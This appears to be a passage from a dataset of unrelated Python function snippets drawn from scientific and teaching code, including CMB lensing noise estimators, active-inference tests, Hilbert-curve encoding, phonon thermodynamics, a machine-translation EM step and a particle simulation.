MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. 
#self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def prove_NNE() -> Proof:\n # Optional Task 6.7b", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n 
self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_put_nveto_pmt_item(self):\n pass", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. 
construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def test_inu(self):\n lmax = 3\n x = np.array([5000])\n result_i, result_k = bessel_sk.lniknu(x, lmax)\n pih = np.log(0.5*np.pi)\n expP = (1+np.exp(-2*x))\n expM = (1-np.exp(-2*x))\n expected_i = np.array([\n -np.log(2*x**1) + x + np.log(expM),\n -np.log(2*x**2) + x + np.log(expM*(x+1)+x-1),\n -np.log(2*x**3) + x + np.log((3+x**2)*expM-3*x*expP),\n -np.log(2*x**4) + x + np.log((15*x+x**3)*expP-(15+6*x**2)*expM) \n ])\n expected_k = np.array([pih -x - 1*np.log(x),\n pih -x - 2*np.log(x) + np.log(x+1),\n pih -x - 3*np.log(x) + np.log(x**2+3*x+3),\n pih -x - 4*np.log(x) + np.log(x**3+6*x**2+15*x+15)\n ])\n assert_almost_equal(result_i[0]/expected_i.T, 1, decimal=4)\n assert_almost_equal(result_k[0]/expected_k.T, 1, decimal=4)", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def prove_I0() -> Proof:\n # Task 4.8", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps 
done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib 
+= 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. 
For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def test_get_nveto_pmt_item(self):\n pass", "def solveverlet(self,T,dt):\r\n t = 0.\r\n self.dt = dt\r\n self.n = int(T/dt)\r\n L = self.param[2]\r\n N = self.particles.size\r\n\r\n self.U = np.zeros([self.n])\r\n\r\n progress = t/T*100\r\n\r\n #JV: Here we define the number of the GxG grid that we will need to calcule the entropy, change in order to change the precision of this grid\r\n self.G = 7\r\n\r\n #JV: We create a list that will be useful for the walls submenu, that will help us in the border conditions of the wall, see in vel_verlet()\r\n self.bouncing = np.zeros(self.particles.size)\r\n\r\n if(self.param[4] == \"Subsystems\"): #JV: If we are on \"Subsystems\", we will count different the types of particles\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2]) #JV: When we are not in \"Subsystems\", we will have the same type of variable, but will only use the [:,:,0] (this is because numba has problems otherwise)\r\n\r\n self.entropy_val = 0\r\n\r\n #JV: If we are simulating the brownian simulation, we initialize the array that will keep track if the brownian particle goes through a wall\r\n if(self.param[4] == \"Brownian\"):\r\n self.wallcount = np.zeros([2])\r\n else:\r\n self.wallcount = np.zeros([2]) #JV: We have to keep both in the same type of variables, otherwise numba will have problems. So now this conditional block is quite poinless. 
TO-ERASE\r\n\r\n np.vectorize(lambda i: i.reset())(self.particles) #This line resets the particles to their initial position\r\n\r\n self.vel_verlet_on = True #JV: If it's true, it will compute with the velocity verlet algorithm, if it's not, it will compute with normal verlet\r\n\r\n self.Nlist = int(1*(self.particles.size)**(1/2)) #JV:This variable defines the number of close particles that will be stored in the list (go to close_particles_list() for more info)\r\n #print(self.Nlist)\r\n\r\n #X,Y,VX,VY has the trajectories of the particles with two indexes that\r\n #access time and particles, respectively\r\n self.X = np.vectorize(lambda i: i.r[0])(self.particles)\r\n self.Y = np.vectorize(lambda i: i.r[1])(self.particles)\r\n self.VX = np.vectorize(lambda i: i.v[0])(self.particles)\r\n self.VY = np.vectorize(lambda i: i.v[1])(self.particles)\r\n\r\n MX, MXT = np.meshgrid(self.X[:],self.X[:])\r\n MY, MYT = np.meshgrid(self.Y[:],self.Y[:])\r\n\r\n #JV: So dx is a nxn simetric array with 0 in the diagonal, and each position is the corresponding distance between the particles,\r\n # so the position [1,2] is the distance between partcle 1 and 2 (x1-x2), and so on\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: we first calculate the matrix that contains in every row the indexs of the m closest particles\r\n\r\n if(self.vel_verlet_on == True):\r\n #JV: We define the variables that we will need in the velocity verlet algorithm\r\n print(\"Computing with the Velocity-Verlet algorithm\")\r\n X0 = self.X\r\n Y0 = self.Y\r\n VX0 = self.VX\r\n VY0 = self.VY\r\n\r\n X1 = self.X\r\n Y1 = self.Y\r\n VX1 = self.VX\r\n VY1 = self.VY\r\n\r\n MX, MXT = np.meshgrid(X0[:],X0[:],copy=False)\r\n MY, MYT = np.meshgrid(Y0[:],Y0[:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n a0 = (1/self.m)*np.transpose(fv(X0[:],Y0[:],dx,dy,r2,t/self.dt,False,self.param[2],self.particles.size,self.U,self.dt,self.close_list,self.Nlist,self.vel_verlet_on,self.R,self.param[3],self.param[4],self.param[5],self.grid,self.G,self.wallcount,self.X2))\r\n\r\n for i in range(0, self.n):\r\n r1 = np.array([X0,Y0]) + np.array([VX0,VY0])*dt + 0.5*a0*dt**2\r\n\r\n MX, MXT = np.meshgrid(r1[0,:],r1[0,:],copy=False)\r\n MY, MYT = np.meshgrid(r1[1,:],r1[1,:],copy=False)\r\n dx = MXT - MX\r\n dx = dx\r\n\r\n dy = MYT - MY\r\n dy = dy\r\n\r\n r2 = np.square(dx)+np.square(dy)\r\n\r\n if(self.param[3] == \"Free!\"):\r\n #JV: We do this to get the actual distance in the case of the \"Free!\" simulation, in which there is no elastic collision between the particles and the boundaries\r\n dx_v2 = (np.abs(dx.copy())-1*L)\r\n r2_v2 = dx_v2**2+dy**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n dy_v2 = (np.abs(dy.copy())-1*L)\r\n r2_v2 = dx**2+dy_v2**2\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > r2_v2,r2_v2,r2)\r\n r2_v2 = dx_v2**2+dy_v2**2\r\n dx = np.where(r2 > r2_v2,dx_v2*np.sign(dx),dx)\r\n dy = np.where(r2 > r2_v2,dy_v2*np.sign(dy),dy)\r\n r2 = np.where(r2 > 
r2_v2,r2_v2,r2)\r\n\r\n #JV: call velocityverlet to compute the next position\r\n if(np.round((t/self.dt*dt)%0.5,1) == 0): #JV: every certain amount of steps we update the list\r\n self.close_list = close_particles_list(r2,self.Nlist,self.particles.size,self.param[2]) #JV: matrix that contains in every row the indexs of the m closest particles\r\n\r\n X1,Y1,VX1,VY1,a1 = vel_verlet(t,dt,np.array([X0,Y0]),np.array([VX0,VY0]),a0,dx,dy,r2,self.close_list,self.m,self.R,L,N,self.param[3],self.param[4],self.param[7],self.param[8],self.param[9],self.U,self.Nlist,self.vel_verlet_on,self.param[5],self.grid,self.G,self.wallcount,self.X2,self.bouncing)\r\n\r\n #JV: Now we check where this particle is in a RxR grid, that will help us to calcule the entropy. We do not do this for the Brownian mode because we don't compute the entropy in that case.\r\n if(self.param[4] != \"Brownian\"):\r\n for h in range(0, N):\r\n if(self.param[4] == \"Subsystems\"):\r\n if(h < self.param[5]**2): #JV: self.param[5] stores the number of n1xn1 type 1 particles\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),0] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G)),1] += 1\r\n else:\r\n self.grid[int((X1[h]+0.495*L) / (L/self.G)), int((Y1[h]+0.495*L) / (L/self.G))] += 1\r\n\r\n if(self.param[4] == \"Brownian\"):\r\n if(self.wallcount[0] == 0):\r\n self.X2 = np.append(self.X2,(abs(X1[N-1]))**2)\r\n else:\r\n self.X2 = np.append(self.X2,(L*self.wallcount[0]+(X1[N-1]))**2)\r\n self.entropy = np.append(self.entropy,self.entropy_val)\r\n\r\n t += dt\r\n\r\n self.X = np.vstack((self.X,X1))\r\n self.Y = np.vstack((self.Y,Y1))\r\n self.VX = np.vstack((self.VX, VX1))\r\n self.VY = np.vstack((self.VY, VY1))\r\n a0 = a1\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n VX0,VY0 = VX1,VY1\r\n\r\n #JV: Every amount of steps of time we calculate the entropy\r\n update_entropy = 2\r\n if(i % update_entropy == 0):\r\n\r\n self.entropy_val = 0\r\n sumagrid = np.sum(self.grid)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n 